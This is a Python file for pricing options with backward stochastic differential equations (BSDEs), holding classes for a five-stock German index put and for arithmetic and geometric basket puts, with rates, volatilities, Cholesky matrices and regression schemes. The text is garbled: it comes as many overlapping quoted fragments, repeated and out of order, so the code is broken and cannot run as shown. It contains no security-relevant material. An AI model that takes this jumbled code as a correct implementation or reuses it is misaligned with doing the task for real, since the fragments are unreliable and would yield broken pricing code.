self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight", "= 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value =", "Reference Solution reference_riskfree = False refererce_adjust = False # Under development class GeometicBasketPut():", "= 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623,", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 +", "Regression functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order", "May 14 17:21:26 2018 @author: <NAME> This file holds the 
parameters for all", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t *", "= \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1])", "np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight =", "self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1])", "scheme for the BSDE. .. todo:: Moving the numerical scheme to the function", "parameters for all specific example and the numerical scheme for the BSDE. ..", "rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False", "parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. 
self.counterparty_bond_repo_rate", "delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples,", "theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7, 27.0,", "regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield", "np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate", "theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "- self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)", "False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): #", "self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis", "delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/", "0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\", "= -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example 
Information", "self.counterparty_bond_repo_rate) * delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def", "theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0])", "regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield", "0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0.,", "# Stock parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets =", "False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and", "1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "terminal_time = 1. buy_sell = -1. 
put_call = \"Put\" # Regression functions and", "expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,", "+self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust", "basket put option for BS model\" self.dimension = dimension # Market parameters and", "delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\", "1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec =", "sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2", "False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket", "\\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self,", "1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] =", "i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:,", "self.buy_sell = 1. 
self.put_call = \"Put\" # Regression functions and parameters self.sorting_method =", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate", "False refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self, dimension): #", "expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6,", "todo:: Moving the numerical scheme to the function file \"\"\" import numpy as", "= 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate =", "= adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec", "= 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate =", "self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta", "price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik',", "rec # Reference Solution reference_riskfree = False refererce_adjust = False Example = ArithmeticBasketPut(5)", "= False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension):", "expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta,", "\"BS\" initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion =", "= \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ +", "[0.91, 
0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition)", "self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion =", "0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0.,", "1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0]", "3 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self, no_of_samples,", "divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0", "- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',", "class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06", "- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield", "self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t,", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :],", "+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\", "0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40.", "adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price = -0.175866", "rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7]", "0. 
self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters", "def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1", "self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)", "__init__(self, dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0.", "3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta,", "i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec # Reference Solution reference_riskfree", "riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta", ", regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield +", "np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar =", "22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1. put_call =", "40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" # Regression functions", "variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t,", "= \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1", "BSDE. .. 
todo:: Moving the numerical scheme to the function file \"\"\" import", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight = np.array([38.1, 6.5, 5.7,", "temp = \\ (1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij->", "\"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression =", "1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1.", "i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:,", "self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield =", "cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate = 0.05 divident_yield =", "17:21:26 2018 @author: <NAME> This file holds the parameters for all specific example", "def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] =", "self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion +", "num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648,", "* (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) *", "np class GermenIndexPut(): # Example Information name = \"Put option for a 5", "Example Information name = \"Put option for a 5 stocks German index model\"", ":], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * 
(self.bank_bond_yield", "40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\" def riskfree_scheme_price(self, theta,", "= 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient,", "0.05 * np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition =", "expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ +", "self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield +", "= \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 + 5 + 1", "Regression functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic", "0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232,", "+ 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):", "1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples,", "0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\"", "riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\\", "derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] =", "delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Regression functions", "option for BS model\" self.dimension = dimension # Market parameters 
and functions self.riskless_rate", "= 5 # Stock parameters stock_model = \"BS\" initial_value = np.array([0.01, 0.01, 0.01,", "= -1. put_call = \"Put\" # Regression functions and parameters sorting_method = \"Intrinsic", "+ self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta, delta_t,", ":]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta)", "* delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) *", "* delta_t * theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product", "\"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic", "theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ riskfree_price/ (1 +", "regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :],", "# Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. 
self.counterparty_bond_yield =", "<NAME> This file holds the parameters for all specific example and the numerical", "* theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta =", "-0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name", "regression_coeff, expect_basis, expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion,", "riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta", "= self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta,", "i',price_coefficient, expect_basis)\\ - delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar", "functions and parameters sorting_method = \"Geometric Intrinsic Value\" basis = \"Geometric Intrinsic Value\"", "riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1])", "function file \"\"\" import numpy as np class GermenIndexPut(): # Example Information name", "= False class ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic", "regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :],", "kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, 
self.cholesky_inverse, delta_process)\\ - delta_t *", "delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar", "regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield", ":]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i,", "(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta def numerical_scheme(self, theta,", "Intrinsic Value\" basis = \"Geometric Intrinsic Value\" basis_order = 2 no_of_regression = 1", "0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) #", "rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t * theta[0] *", "ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t", "expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate", "* (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar +", "adjusted_delta[:, i] return rec # Reference Solution reference_riskfree = False refererce_adjust = False", "= 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0. 
self.variation_margin_interest_rate = 0.1 self.stock_repo_rate =", "name = \"Put option for a 5 stocks German index model\" dimension =", "# Product parameters self.weight = 1/dimension * np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time", "self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "= 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self,", "delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i +", "= \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "file holds the parameters for all specific example and the numerical scheme for", "dimension): # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield", "* np.ones(num_of_assets, dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1.,", "np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "* np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40. *", "27.0, 22.7], dtype=np.double) strike = 1. terminal_time = 1. buy_sell = -1. put_call", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t *", "self.counterparty_bond_repo_rate = 0. 
self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) #", "range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in", "i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2", "theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i',", "rec[:,0] = derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:,", "= np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071,", "- self.counterparty_bond_repo_rate) * delta_t * theta[0])\\ + delta_t * (1 - theta[0]) *", "initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5", "\"\"\" Created on Mon May 14 17:21:26 2018 @author: <NAME> This file holds", "# Market parameters and functions riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield", "0., 0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\", "\\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :],", "self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t,", "0.07 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40.", "delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate * delta_t) *", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return 
riskfree_delta def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):", "np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield +", "regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :],", "German index model\" dimension = 5 # Stock parameters stock_model = \"BS\" initial_value", ":], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield -", "__init__(self, dimension): # Example Information self.name = \"Arithmetic basket put option for BS", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0]", "5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0]", "- (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\\ - delta_t", "->ik', expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j,", "delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta,", "* (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0,", "def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ -", "kj ->ik', expect_basis, delta_coefficient)\\ + 
(1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) *", "self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield +", "in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree", "np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield -", "= np.linalg.cholesky(self.correlation_matrix) self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition) # Product parameters self.weight = 1/dimension * np.ones(dimension,", "= \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:],", "self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def", "self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\", "(1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j,", "ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)", "\"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp = \\", "jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)", "expect_basis, delta_coefficient)\\ + (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk->", "+ self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 
+ (self.bank_bond_yield", "strike = 1. terminal_time = 1. buy_sell = -1. put_call = \"Put\" #", "functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0. self.counterparty_bond_repo_rate = 0.", "# Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions", "example and the numerical scheme for the BSDE. .. todo:: Moving the numerical", "development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate =", "numerical scheme for the BSDE. .. todo:: Moving the numerical scheme to the", "expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t,", "= \"Put option for a 5 stocks German index model\" dimension = 5", "delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk ->", ":], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield +", "self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta,", "0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]])", "= 3 no_of_regression = 1 + 5 + 1 + 5 def regression_variable(self,", "= \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order = 3 self.no_of_regression = 1", "adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:,", "stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float) def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient,", "0 